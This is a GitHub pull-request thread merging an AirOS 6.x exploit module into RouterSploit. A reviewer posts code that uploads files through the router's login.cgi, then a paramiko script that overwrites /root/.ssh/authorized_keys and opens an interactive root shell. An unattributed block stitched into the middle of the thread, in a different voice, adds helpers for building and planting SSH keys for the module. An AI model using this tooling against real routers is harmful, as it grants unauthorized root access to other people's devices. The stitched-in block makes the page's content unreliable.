
Added exploit module to AirOS 6.x #35

Merged
merged 4 commits into from
Apr 27, 2016

Conversation

viniciusmarangoni
Contributor

No description provided.

@lucyoa
Contributor

lucyoa commented Apr 26, 2016

Wow, I see a pretty advanced exploit. I have played around with it and we can even improve it.

1. http_request instead of requests

requests.post can be changed to http_request. So instead of

requests.post(url + 'login.cgi', files=upload_params, verify=False) 

use

http_request(method="POST", url=url, files=upload_params)
  • function returns a request object (with all properties like status_code, text etc.) and None if any exception occurred.
  • verify=False property is set by default
  • it handles exceptions related to the connection problems

You can just check if the response is None and if it's not, move on with exploitation:

url = sanitize_url('{0}:{1}/login.cgi'.format(self.target, self.port))
response = http_request(method="POST", url=url, files=upload_params)
if response is None:
    return

print response.status_code
print response.text

2. Dynamic SSH keys
Currently the user's SSH public key is sent to authorized_keys. We can improve it by dynamically generating RSA keys, sending the public key to the device and invoking an interactive ssh shell using the private key.

I created the following proof of concept script that shows how to generate keys and invoke an interactive ssh shell with paramiko. I think it might be helpful:

#!/usr/bin/env python

import paramiko
from paramiko.py3compat import u
import StringIO
import os
import termios
import tty
import sys
import select
import socket

def own(bits=1024):
    # generating RSA keys
    k = paramiko.RSAKey.generate(bits)
    public_key = k.get_base64()
    private_key = StringIO.StringIO()
    k.write_private_key(private_key)

    # adding generated public key to authorized keys (only example how it works)
    f = open('/root/.ssh/authorized_keys','w+')
    f.write('ssh-rsa ' + public_key)
    f.close()

    # connecting to ssh server using created private key
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    not_file = StringIO.StringIO(private_key.getvalue())
    pkey = paramiko.RSAKey.from_private_key(not_file)
    not_file.close()

    client.connect("127.0.0.1", 22, username="root", pkey=pkey)

    # invoking interactive shell
    chan = client.invoke_shell()
    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)

        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)

    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)

own()

Could you adapt these changes in your pull request? I can also modify it myself and you would test whether it works on your device with AirOS.

Btw. I'd love to see this exploit in action - https://asciinema.org/ is awesome for this.
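An added, stand-alone example (not the PR's code and not RouterSploit's own helper): the entry the suggestion above pushes to the device is the text "ssh-rsa " followed by the RFC 4253 public-key blob that paramiko's RSAKey.get_base64() returns, and the PoC writes it with open(..., 'w+') and no trailing newline, which replaces whatever keys were already on the target. The Python 3 code below shows what that blob contains (encoding and decoding it from the RSA values e and n), and builds, appends and later removes a single authorized_keys entry without clobbering existing ones, which is what a module that plants an ephemeral key wants for cleanup. The modulus, the pre-existing authorized_keys line and all function names are constructed for illustration; a real module would take e and n from RSAKey.generate().

```python
#!/usr/bin/env python3
"""Added example (not RouterSploit code, not from the PR author): the
OpenSSH 'ssh-rsa' public-key encoding that RSAKey.get_base64() emits,
and helpers that add/remove one authorized_keys line non-destructively."""
import base64
import struct


def _ssh_string(data: bytes) -> bytes:
    # RFC 4253 "string": big-endian uint32 length, then the raw bytes
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    # RFC 4253 "mpint": big-endian two's complement, no redundant leading
    # zero bytes, plus one 0x00 byte when the top bit is set so the value
    # is not read as negative
    if n == 0:
        return _ssh_string(b"")
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)


def encode_rsa_public_key(e: int, n: int) -> str:
    """Base64 blob that follows 'ssh-rsa ' in authorized_keys
    (what paramiko.RSAKey.get_base64() returns for the same e, n)."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return base64.b64encode(blob).decode("ascii")


def decode_rsa_public_key(b64: str):
    """Parse the blob back into (e, n); raises ValueError on malformed input
    (binascii.Error from bad base64 is a ValueError subclass)."""
    blob = base64.b64decode(b64)
    fields = []
    off = 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError("truncated length prefix")
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        if off + length > len(blob):
            raise ValueError("field runs past end of blob")
        fields.append(blob[off:off + length])
        off += length
    if len(fields) != 3 or fields[0] != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key blob")
    return int.from_bytes(fields[1], "big"), int.from_bytes(fields[2], "big")


def is_valid_rsa_blob(b64: str) -> bool:
    """Cheap sanity check before uploading: does the text parse as ssh-rsa?"""
    try:
        decode_rsa_public_key(b64)
        return True
    except ValueError:
        return False


def authorized_keys_line(b64: str, comment: str = "routersploit-ephemeral") -> str:
    """One complete entry, including the newline the PoC's f.write() omits.
    The comment tags the key so cleanup can find it later."""
    return "ssh-rsa {} {}\n".format(b64, comment)


def add_key(existing: str, line: str) -> str:
    """Append `line` to the current authorized_keys contents.
    Unlike open(..., 'w+') in the PoC this keeps the device's other keys,
    repairs a missing final newline, and is idempotent."""
    if line.strip() in (l.strip() for l in existing.splitlines()):
        return existing
    if existing and not existing.endswith("\n"):
        existing += "\n"
    return existing + line


def remove_key(existing: str, line: str) -> str:
    """Drop our entry again on cleanup, leaving every other line intact."""
    kept = [l for l in existing.splitlines() if l.strip() != line.strip()]
    return "".join(l + "\n" for l in kept)


if __name__ == "__main__":
    # Constructed sample values, NOT a real key: a 128-bit modulus keeps
    # the blob short. A real module takes e, n from RSAKey.generate().
    e, n = 65537, 0xC2A3B4E5F60718293A4B5C6D7E8F9011
    blob = encode_rsa_public_key(e, n)
    print(blob, decode_rsa_public_key(blob) == (e, n))
    # Constructed pre-existing authorized_keys content with no final newline
    current = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQ operator@host"
    merged = add_key(current, authorized_keys_line(blob))
    print(merged, end="")
    print(remove_key(merged, authorized_keys_line(blob)) == current + "\n")
```

Every ssh-rsa blob with e = 65537 starts with AAAAB3NzaC1yc2EAAAADAQAB (the "ssh-rsa" string and the 3-byte exponent), which is a handy check that what a module uploads is really a public key and not, say, the PEM private key by mistake.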

@viniciusmarangoni
Contributor Author

Ok. I will adapt it and add the changes to this pull. Thanks for the suggestions.

@viniciusmarangoni
Contributor Author

The changes were done. To see the exploit in action, watch the asciinema:
https://asciinema.org/a/byel8965webtwilih1gg2hvyq

I will commit the changes

@lucyoa
Contributor

lucyoa commented Apr 27, 2016

Great job. Happy to add your exploit to RouterSploit.

@lucyoa lucyoa merged commit a99812a into threat9:master Apr 27, 2016
@fwkz fwkz added the module label May 7, 2016